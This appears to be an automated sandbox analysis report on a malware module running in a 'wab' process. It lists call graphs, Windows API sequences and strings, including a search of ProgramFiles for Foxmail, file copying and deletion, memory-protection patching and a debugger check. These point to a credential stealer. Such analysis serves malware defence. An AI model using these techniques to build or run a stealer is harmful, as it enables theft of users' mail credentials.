6720->6729 6723 24399af9 6721->6723 6725 243962ac _abort 26 API calls 6723->6725 6724 24399a89 6726 24399aba 6724->6726 6727 24399aa5 6724->6727 6725->6729 6739 24399b0d 6726->6739 6728 24396368 __dosmaperr 20 API calls 6727->6728 6731 24399aaa 6728->6731 6729->6687 6733 24396355 __dosmaperr 20 API calls 6731->6733 6732 24399ab5 6790 24399ae4 6732->6790 6733->6732 6736 24395b7a _abort 20 API calls 6735->6736 6737 2439635a 6736->6737 6737->6720 6738->6724 6740 24399b3b 6739->6740 6786 24399b34 6739->6786 6741 24399b3f 6740->6741 6742 24399b5e 6740->6742 6744 24396355 __dosmaperr 20 API calls 6741->6744 6745 24399baf 6742->6745 6746 24399b92 6742->6746 6743 24392ada _ValidateLocalCookies 5 API calls 6747 24399d15 6743->6747 6748 24399b44 6744->6748 6750 24399bc5 6745->6750 6793 2439a00b 6745->6793 6749 24396355 __dosmaperr 20 API calls 6746->6749 6747->6732 6751 24396368 __dosmaperr 20 API calls 6748->6751 6752 24399b97 6749->6752 6796 243996b2 6750->6796 6754 24399b4b 6751->6754 6757 24396368 __dosmaperr 20 API calls 6752->6757 6758 243962ac _abort 26 API calls 6754->6758 6761 24399b9f 6757->6761 6758->6786 6759 24399c0c 6765 24399c20 6759->6765 6766 24399c66 WriteFile 6759->6766 6760 24399bd3 6762 24399bf9 6760->6762 6763 24399bd7 6760->6763 6764 243962ac _abort 26 API calls 6761->6764 6808 24399492 GetConsoleCP 6762->6808 6780 24399ccd 6763->6780 6803 24399645 6763->6803 6764->6786 6769 24399c28 6765->6769 6770 24399c56 6765->6770 6768 24399c89 GetLastError 6766->6768 6776 24399bef 6766->6776 6768->6776 6773 24399c46 6769->6773 6777 24399c2d 6769->6777 6834 24399728 6770->6834 6826 243998f5 6773->6826 6775 24396368 __dosmaperr 20 API calls 6778 24399cf2 6775->6778 6779 24399ca9 6776->6779 6776->6780 6776->6786 6777->6780 6819 24399807 6777->6819 6782 24396355 __dosmaperr 20 API calls 6778->6782 6783 24399cb0 6779->6783 6784 24399cc4 6779->6784 6780->6775 6780->6786 6782->6786 6787 24396368 __dosmaperr 20 API calls 6783->6787 6841 24396332 6784->6841 6786->6743 6788 24399cb5 6787->6788 6789 24396355 __dosmaperr 20 API calls 6788->6789 6789->6786 6898 24398c9e RtlLeaveCriticalSection 6790->6898 6792 24399aea 6792->6729 6846 24399f8d 6793->6846 6868 24398dbc 6796->6868 6798 243996c2 6799 243996c7 6798->6799 6800 24395af6 _abort 38 API calls 6798->6800 6799->6759 6799->6760 6801 243996ea 6800->6801 6801->6799 6802 24399708 GetConsoleMode 6801->6802 6802->6799 6804 2439969f 6803->6804 6807 2439966a 6803->6807 6804->6776 6805 2439a181 WriteConsoleW CreateFileW 6805->6807 6806 243996a1 GetLastError 6806->6804 6807->6804 6807->6805 6807->6806 6810 243994f5 6808->6810 6814 24399607 6808->6814 6809 24392ada _ValidateLocalCookies 5 API calls 6811 24399641 6809->6811 6813 2439957b WideCharToMultiByte 6810->6813 6810->6814 6816 243979e6 40 API calls __fassign 6810->6816 6818 243995d2 WriteFile 6810->6818 6877 24397c19 6810->6877 6811->6776 6813->6814 6815 243995a1 WriteFile 6813->6815 6814->6809 6815->6810 6817 2439962a GetLastError 6815->6817 6816->6810 6817->6814 6818->6810 6818->6817 6820 24399816 6819->6820 6821 243998d8 6820->6821 6822 24399894 WriteFile 6820->6822 6823 24392ada _ValidateLocalCookies 5 API calls 6821->6823 6822->6820 6824 243998da GetLastError 6822->6824 6825 243998f1 6823->6825 6824->6821 6825->6776 6831 24399904 6826->6831 6827 24399a0f 6828 24392ada _ValidateLocalCookies 5 API calls 6827->6828 6829 24399a1e 6828->6829 6829->6776 6830 24399986 WideCharToMultiByte 6832 243999bb WriteFile 6830->6832 6833 24399a07 GetLastError 6830->6833 6831->6827 6831->6830 6831->6832 6832->6831 6832->6833 6833->6827 6839 24399737 6834->6839 6835 243997ea 6836 24392ada _ValidateLocalCookies 5 API calls 6835->6836 6838 24399803 6836->6838 6837 243997a9 WriteFile 6837->6839 6840 243997ec GetLastError 6837->6840 6838->6776 6839->6835 6839->6837 6840->6835 6842 24396355 __dosmaperr 20 API calls 6841->6842 6843 2439633d __dosmaperr 6842->6843 6844 24396368 __dosmaperr 20 API calls 6843->6844 6845 24396350 6844->6845 6845->6786 6855 24398d52 6846->6855 6848 24399f9f 6849 24399fb8 SetFilePointerEx 6848->6849 6850 24399fa7 6848->6850 6852 24399fd0 GetLastError 6849->6852 6854 24399fac 6849->6854 6851 24396368 __dosmaperr 20 API calls 6850->6851 6851->6854 6853 24396332 __dosmaperr 20 API calls 6852->6853 6853->6854 6854->6750 6856 24398d5f 6855->6856 6859 24398d74 6855->6859 6857 24396355 __dosmaperr 20 API calls 6856->6857 6858 24398d64 6857->6858 6861 24396368 __dosmaperr 20 API calls 6858->6861 6860 24396355 __dosmaperr 20 API calls 6859->6860 6862 24398d99 6859->6862 6863 24398da4 6860->6863 6864 24398d6c 6861->6864 6862->6848 6865 24396368 __dosmaperr 20 API calls 6863->6865 6864->6848 6866 24398dac 6865->6866 6867 243962ac _abort 26 API calls 6866->6867 6867->6864 6869 24398dc9 6868->6869 6870 24398dd6 6868->6870 6871 24396368 __dosmaperr 20 API calls 6869->6871 6872 24398de2 6870->6872 6873 24396368 __dosmaperr 20 API calls 6870->6873 6874 24398dce 6871->6874 6872->6798 6875 24398e03 6873->6875 6874->6798 6876 243962ac _abort 26 API calls 6875->6876 6876->6874 6878 24395af6 _abort 38 API calls 6877->6878 6879 24397c24 6878->6879 6882 24397a00 6879->6882 6883 24397a28 6882->6883 6884 24397a13 6882->6884 6883->6810 6884->6883 6886 24397f0f 6884->6886 6887 24397f1b ___scrt_is_nonwritable_in_current_image 6886->6887 6888 24395af6 _abort 38 API calls 6887->6888 6889 24397f24 6888->6889 6890 24395671 _abort RtlEnterCriticalSection 6889->6890 6897 24397f72 _abort 6889->6897 6891 24397f42 6890->6891 6892 24397f86 __fassign 20 API calls 6891->6892 6893 24397f56 6892->6893 6894 24397f75 __fassign RtlLeaveCriticalSection 6893->6894 6895 24397f69 6894->6895 6896 243955a8 _abort 38 API calls 6895->6896 6895->6897 6896->6897 6897->6883 6898->6792 6902 2439ad24 6899->6902 6901 2439adca 6901->6708 6903 2439ad30 ___scrt_is_nonwritable_in_current_image 6902->6903 6913 24398c7b RtlEnterCriticalSection 6903->6913 6905 2439ad3e 6906 2439ad70 6905->6906 6907 2439ad65 6905->6907 6908 24396368 __dosmaperr 20 API calls 6906->6908 6914 2439ae4d 6907->6914 6910 2439ad6b 6908->6910 6929 2439ad9a 6910->6929 6912 2439ad8d _abort 6912->6901 6913->6905 6915 24398d52 26 API calls 6914->6915 6918 2439ae5d 6915->6918 6916 2439ae63 6932 24398cc1 6916->6932 6918->6916 6919 2439ae95 6918->6919 6922 24398d52 26 API calls 6918->6922 6919->6916 6920 24398d52 26 API calls 6919->6920 6923 2439aea1 CloseHandle 6920->6923 6925 2439ae8c 6922->6925 6923->6916 6926 2439aead GetLastError 6923->6926 6924 2439aedd 6924->6910 6928 24398d52 26 API calls 6925->6928 6926->6916 6927 24396332 __dosmaperr 20 API calls 6927->6924 6928->6919 6941 24398c9e RtlLeaveCriticalSection 6929->6941 6931 2439ada4 6931->6912 6933 24398cd0 6932->6933 6934 24398d37 6932->6934 6933->6934 6940 24398cfa 6933->6940 6935 24396368 __dosmaperr 20 API calls 6934->6935 6936 24398d3c 6935->6936 6937 24396355 __dosmaperr 20 API calls 6936->6937 6938 24398d27 6937->6938 6938->6924 6938->6927 6939 24398d21 SetStdHandle 6939->6938 6940->6938 6940->6939 6941->6931 6942->6681 6943->6661 6412 2439220c 6413 2439221a dllmain_dispatch 6412->6413 6414 24392215 6412->6414 6416 243922b1 6414->6416 6417 243922c7 6416->6417 6419 243922d0 6417->6419 6420 24392264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6417->6420 6419->6413 6420->6419 6944 2439284f 6945 24392882 std::exception::exception 27 API calls 6944->6945 6946 2439285d 6945->6946 6947 2439724e GetProcessHeap 6948 24398640 6951 24398657 6948->6951 6952 24398679 6951->6952 6953 24398665 6951->6953 6955 24398681 6952->6955 6956 24398693 6952->6956 6954 24396368 __dosmaperr 20 API calls 6953->6954 6958 2439866a 6954->6958 6957 24396368 __dosmaperr 20 API calls 6955->6957 6963 24398652 6956->6963 6964 243954a7 6956->6964 6959 24398686 6957->6959 6961 243962ac _abort 26 API calls 6958->6961 6962 243962ac _abort 26 API calls 6959->6962 6961->6963 6962->6963 6965 243954ba 6964->6965 6966 243954c4 6964->6966 6965->6963 6966->6965 6967 24395af6 _abort 38 API calls 6966->6967 6968 243954e5 6967->6968 6969 24397a00 __fassign 38 API calls 6968->6969 6970 243954fe 6969->6970 6972 24397a2d 6970->6972 6973 24397a40 6972->6973 6975 24397a55 6972->6975 6973->6975 6976 24396d7e 6973->6976 6975->6965 6977 24396d8a ___scrt_is_nonwritable_in_current_image 6976->6977 6978 24395af6 _abort 38 API calls 6977->6978 6983 24396d94 6978->6983 6980 24396e18 _abort 6980->6975 6982 243955a8 _abort 38 API calls 6982->6983 6983->6980 6983->6982 6984 2439571e _free 20 API calls 6983->6984 6985 24395671 RtlEnterCriticalSection 6983->6985 6986 24396e0f 6983->6986 6984->6983 6985->6983 6989 243956b9 RtlLeaveCriticalSection 6986->6989 6988 24396e16 6988->6983 6989->6988 7284 24397a80 7285 24397a8d 7284->7285 7286 2439637b _abort 20 API calls 7285->7286 7287 24397aa7 7286->7287 7288 2439571e _free 20 API calls 7287->7288 7289 24397ab3 7288->7289 7290 24397ad9 7289->7290 7291 2439637b _abort 20 API calls 7289->7291 7293 24395eb7 11 API calls 7290->7293 7295 24397ae5 7290->7295 7292 24397acd 7291->7292 7294 2439571e _free 20 API calls 7292->7294 7293->7290 7294->7290 6421 24397103 GetCommandLineA GetCommandLineW 6422 24395303 6425 243950a5 6422->6425 6434 2439502f 6425->6434 6428 2439502f 5 API calls 6429 243950c3 6428->6429 6438 24395000 6429->6438 6432 24395000 20 API calls 6433 243950d9 6432->6433 6435 24395048 6434->6435 6436 24392ada _ValidateLocalCookies 5 API calls 6435->6436 6437 24395069 6436->6437 6437->6428 6439 2439500d 6438->6439 6440 2439502a 6438->6440 6441 24395024 6439->6441 6443 2439571e _free 20 API calls 6439->6443 6440->6432 6442 2439571e _free 20 API calls 6441->6442 6442->6440 6443->6439 6990 2439af43 6991 2439af59 6990->6991 6992 2439af4d 6990->6992 6992->6991 6993 2439af52 CloseHandle 6992->6993 6993->6991 6994 2439a945 6996 2439a96d 6994->6996 6995 2439a9a5 6996->6995 6997 2439a99e 6996->6997 6998 2439a997 6996->6998 7007 2439aa00 6997->7007 7003 2439aa17 6998->7003 7004 2439aa20 7003->7004 7011 2439b19b 7004->7011 7008 2439aa20 7007->7008 7009 2439b19b __startOneArgErrorHandling 21 API calls 7008->7009 7010 2439a9a3 7009->7010 7012 2439b1da __startOneArgErrorHandling 7011->7012 7017 2439b25c __startOneArgErrorHandling 7012->7017 7021 2439b59e 7012->7021 7014 2439b286 7015 2439b8b2 __startOneArgErrorHandling 20 API calls 7014->7015 7016 2439b292 7014->7016 7015->7016 7018 24392ada _ValidateLocalCookies 5 API calls 7016->7018 7017->7014 7019 243978a3 __startOneArgErrorHandling 5 API calls 7017->7019 7020 2439a99c 7018->7020 7019->7014 7022 2439b5c1 __raise_exc RaiseException 7021->7022 7023 2439b5bc 7022->7023 7023->7017 7677 24397bc7 7678 24397bd3 ___scrt_is_nonwritable_in_current_image 7677->7678 7679 24397c0a _abort 7678->7679 7685 24395671 RtlEnterCriticalSection 7678->7685 7681 24397be7 7686 24397f86 7681->7686 7685->7681 7687 24397bf7 7686->7687 7688 24397f94 __fassign 7686->7688 7690 24397c10 7687->7690 7688->7687 7689 24397cc2 __fassign 20 API calls 7688->7689 7689->7687 7693 243956b9 RtlLeaveCriticalSection 7690->7693 7692 24397c17 7692->7679 7693->7692 7694 2439a1c6 IsProcessorFeaturePresent

                                            Control-flow Graph

                                            APIs
                                            • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 24391137
                                            • lstrcatW.KERNEL32(?,?), ref: 24391151
                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2439115C
                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2439116D
                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2439117C
                                            • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 24391193
                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 243911D0
                                            • FindClose.KERNELBASE(00000000), ref: 243911DB
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                            • String ID:
                                            • API String ID: 1083526818-0
                                            • Opcode ID: e76d7d6019fbad7818fbee06672b761710ba97f20c23d5ca1f35f8b7db8ac991
                                            • Instruction ID: 54f762787b456acb95a32fbb625e3d67921ba99f1295696926b17ebba5f2d61e
                                            • Opcode Fuzzy Hash: e76d7d6019fbad7818fbee06672b761710ba97f20c23d5ca1f35f8b7db8ac991
                                            • Instruction Fuzzy Hash: 022161725043487BE721EA64EC49F9B7BDCEF84314F000D2AF958E3190EA75D6158796

                                            Control-flow Graph

                                            APIs
                                            • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 24391434
                                              • Part of subcall function 243910F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 24391137
                                              • Part of subcall function 243910F1: lstrcatW.KERNEL32(?,?), ref: 24391151
                                              • Part of subcall function 243910F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2439115C
                                              • Part of subcall function 243910F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2439116D
                                              • Part of subcall function 243910F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2439117C
                                              • Part of subcall function 243910F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 24391193
                                              • Part of subcall function 243910F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 243911D0
                                              • Part of subcall function 243910F1: FindClose.KERNELBASE(00000000), ref: 243911DB
                                            • lstrlenW.KERNEL32(?), ref: 243914C5
                                            • lstrlenW.KERNEL32(?), ref: 243914E0
                                            • lstrlenW.KERNEL32(?,?), ref: 2439150F
                                            • lstrcatW.KERNEL32(00000000), ref: 24391521
                                            • lstrlenW.KERNEL32(?,?), ref: 24391547
                                            • lstrcatW.KERNEL32(00000000), ref: 24391553
                                            • lstrlenW.KERNEL32(?,?), ref: 24391579
                                            • lstrcatW.KERNEL32(00000000), ref: 24391585
                                            • lstrlenW.KERNEL32(?,?), ref: 243915AB
                                            • lstrcatW.KERNEL32(00000000), ref: 243915B7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                            • String ID: )$Foxmail$ProgramFiles
                                            • API String ID: 672098462-2938083778
                                            • Opcode ID: 84df14fcaa6fd9eee44f317c81a0c8b7354f385ba8706af82cea510ec62e16c0
                                            • Instruction ID: acb84fc608a8a90d7db1686cd9256de54086ad032d3abe01d3b034b699002c39
                                            • Opcode Fuzzy Hash: 84df14fcaa6fd9eee44f317c81a0c8b7354f385ba8706af82cea510ec62e16c0
                                            • Instruction Fuzzy Hash: 5E819471A40368BAEF20D7A1DC95FEE7379EF84710F00059AF509E7290EA715A84CF95

                                            Control-flow Graph

                                            APIs
                                            • GetModuleHandleA.KERNEL32(2439C7DD), ref: 2439C7E6
                                            • GetModuleHandleA.KERNEL32(?,2439C7DD), ref: 2439C838
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 2439C860
                                              • Part of subcall function 2439C803: GetProcAddress.KERNEL32(00000000,2439C7F4), ref: 2439C804
                                              • Part of subcall function 2439C803: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,2439C7F4,2439C7DD), ref: 2439C816
                                              • Part of subcall function 2439C803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,2439C7F4,2439C7DD), ref: 2439C82A
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProcProtectVirtual
                                            • String ID:
                                            • API String ID: 2099061454-0
                                            • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                            • Instruction ID: 91d1a3f169a6223dd5367fc2fe0e9cb8d00c9c485cfcf45ae0fe2be6d0231ddb
                                            • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                            • Instruction Fuzzy Hash: AE012430A4D751FCFB1196784C05EBAAFDC9F276A0B101B96E240D7193D9B08A06C3F6

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 79 2439c7a7-2439c7bc 80 2439c82d 79->80 81 2439c7be-2439c7c6 79->81 83 2439c82f-2439c833 80->83 81->80 82 2439c7c8-2439c7f6 call 2439c7e6 81->82 90 2439c7f8 82->90 91 2439c86c-2439c86e 82->91 85 2439c872 call 2439c877 83->85 86 2439c835-2439c83d GetModuleHandleA 83->86 89 2439c83f-2439c847 86->89 89->89 92 2439c849-2439c84c 89->92 95 2439c85b-2439c85e 90->95 96 2439c7fa-2439c7fe 90->96 93 2439c870 91->93 94 2439c866-2439c86b 91->94 92->83 97 2439c84e-2439c850 92->97 93->92 94->91 100 2439c85f-2439c860 GetProcAddress 95->100 102 2439c865 96->102 103 2439c800-2439c80b GetProcAddress 96->103 98 2439c852-2439c854 97->98 99 2439c856-2439c85a 97->99 98->100 99->95 100->102 102->94 103->80 104 2439c80d-2439c81a VirtualProtect 103->104 105 2439c82c 104->105 106 2439c81c-2439c82a VirtualProtect 104->106 105->80 106->105
                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,2439C7DD), ref: 2439C838
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 2439C860
                                              • Part of subcall function 2439C7E6: GetModuleHandleA.KERNEL32(2439C7DD), ref: 2439C7E6
                                              • Part of subcall function 2439C7E6: GetProcAddress.KERNEL32(00000000,2439C7F4), ref: 2439C804
                                              • Part of subcall function 2439C7E6: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,2439C7F4,2439C7DD), ref: 2439C816
                                              • Part of subcall function 2439C7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,2439C7F4,2439C7DD), ref: 2439C82A
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProcProtectVirtual
                                            • String ID:
                                            • API String ID: 2099061454-0
                                            • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                            • Instruction ID: a225733e31f569144018cbaaabb68568ec24237e9e93f2ed3e3afd99e5ad23f1
                                            • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                            • Instruction Fuzzy Hash: F121037254D281EFF7128BB88C04BA67FD89F172A0F190A96D140CB183D5B88946C3A6

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 107 2439c803-2439c80b GetProcAddress 108 2439c82d 107->108 109 2439c80d-2439c81a VirtualProtect 107->109 112 2439c82f-2439c833 108->112 110 2439c82c 109->110 111 2439c81c-2439c82a VirtualProtect 109->111 110->108 111->110 113 2439c872 call 2439c877 112->113 114 2439c835-2439c83d GetModuleHandleA 112->114 116 2439c83f-2439c847 114->116 116->116 117 2439c849-2439c84c 116->117 117->112 118 2439c84e-2439c850 117->118 119 2439c852-2439c854 118->119 120 2439c856-2439c85e 118->120 121 2439c85f-2439c865 GetProcAddress 119->121 120->121 124 2439c866-2439c86e 121->124 126 2439c870 124->126 126->117
                                            APIs
                                            • GetProcAddress.KERNEL32(00000000,2439C7F4), ref: 2439C804
                                            • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,2439C7F4,2439C7DD), ref: 2439C816
                                            • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,2439C7F4,2439C7DD), ref: 2439C82A
                                            • GetModuleHandleA.KERNEL32(?,2439C7DD), ref: 2439C838
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 2439C860
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: AddressProcProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 2152742572-0
                                            • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                            • Instruction ID: a1c8e3d28cde5fef12ad4eaa268a8754db08124858eee9d321a255f62a7a77c5
                                            • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                            • Instruction Fuzzy Hash: FDF0F67164D740FCFB1145B40C45EF69FCC8B276A0B101A96E204C7183D8B58906C3F6
                                            APIs
                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 243961DA
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 243961E4
                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 243961F1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                            • String ID:
                                            • API String ID: 3906539128-0
                                            • Opcode ID: 7a462b19b3e67b432d10a52cece1f09b92d79e93cc195d0eda1791bcf345453e
                                            • Instruction ID: 30d2cfce53fada6165d349f0be355d96716f526be3b3a72d6f301f4ed8384596
                                            • Opcode Fuzzy Hash: 7a462b19b3e67b432d10a52cece1f09b92d79e93cc195d0eda1791bcf345453e
                                            • Instruction Fuzzy Hash: 4F31E57590122CABCB21DF24D988B9DBBF8FF08710F5041DAE81CAB250EB349B818F45
                                            APIs
                                            • GetCurrentProcess.KERNEL32(?,?,24394A8A,?,243A2238,0000000C,24394BBD,00000000,00000000,00000001,24392082,243A2108,0000000C,24391F3A,?), ref: 24394AD5
                                            • TerminateProcess.KERNEL32(00000000,?,24394A8A,?,243A2238,0000000C,24394BBD,00000000,00000000,00000001,24392082,243A2108,0000000C,24391F3A,?), ref: 24394ADC
                                            • ExitProcess.KERNEL32 ref: 24394AEE
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: Process$CurrentExitTerminate
                                            • String ID:
                                            • API String ID: 1703294689-0
                                            • Opcode ID: f5047abc25420088b9c8b03fada8d3e2be6dd573c30ce20775b598a2897b2f1f
                                            • Instruction ID: 2aad1df41ba145aa7f4846d900475ffbf72397e4bd99f4d93d62b91cebe511e2
                                            • Opcode Fuzzy Hash: f5047abc25420088b9c8b03fada8d3e2be6dd573c30ce20775b598a2897b2f1f
                                            • Instruction Fuzzy Hash: 94E04632404208BFDF026F24DD09A5A3FADEF14361B404010FA099B221DB3AE942CA44
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: HeapProcess
                                            • String ID:
                                            • API String ID: 54951025-0
                                            • Opcode ID: 1cc64406a9182ba3e418ee8870ae75446a63b71af84745e0ee7a1c0ba86d773b
                                            • Instruction ID: 7f31166aed8da23f8909e95d556e2861d95eff790432d735fd2672fee6bbaae9
                                            • Opcode Fuzzy Hash: 1cc64406a9182ba3e418ee8870ae75446a63b71af84745e0ee7a1c0ba86d773b
                                            • Instruction Fuzzy Hash: 28A01130A002028F83028E3A820A22C3AAEEA082803000028B808EA200EB2880008A00

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 136 2439173a-243917fe call 2439c030 call 24392c40 * 2 143 24391803 call 24391cca 136->143 144 24391808-2439180c 143->144 145 243919ad-243919b1 144->145 146 24391812-24391816 144->146 146->145 147 2439181c-24391837 call 24391ede 146->147 150 2439183d-24391845 147->150 151 2439199f-243919ac call 24391ee7 * 2 147->151 152 2439184b-2439184e 150->152 153 24391982-24391985 150->153 151->145 152->153 157 24391854-24391881 call 243944b0 * 2 call 24391db7 152->157 155 24391995-24391999 153->155 156 24391987 153->156 155->150 155->151 159 2439198a-2439198d call 24392c40 156->159 170 2439193d-24391943 157->170 171 24391887-2439189f call 243944b0 call 24391db7 157->171 165 24391992 159->165 165->155 173 2439197e-24391980 170->173 174 24391945-24391947 170->174 171->170 185 243918a5-243918a8 171->185 173->159 174->173 176 24391949-2439194b 174->176 178 2439194d-2439194f 176->178 179 24391961-2439197c call 243916aa 176->179 182 24391951-24391953 178->182 183 24391955-24391957 178->183 179->165 182->179 182->183 186 24391959-2439195b 183->186 187 2439195d-2439195f 183->187 188 243918aa-243918c2 call 243944b0 call 24391db7 185->188 189 243918c4-243918dc call 243944b0 call 24391db7 185->189 186->179 186->187 187->173 187->179 188->189 198 243918e2-2439193b call 243916aa call 243915da call 24392c40 * 2 188->198 189->155 189->198 198->155
                                            APIs
                                              • Part of subcall function 24391CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 24391D1B
                                              • Part of subcall function 24391CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 24391D37
                                              • Part of subcall function 24391CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24391D4B
                                            • _strlen.LIBCMT ref: 24391855
                                            • _strlen.LIBCMT ref: 24391869
                                            • _strlen.LIBCMT ref: 2439188B
                                            • _strlen.LIBCMT ref: 243918AE
                                            • _strlen.LIBCMT ref: 243918C8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
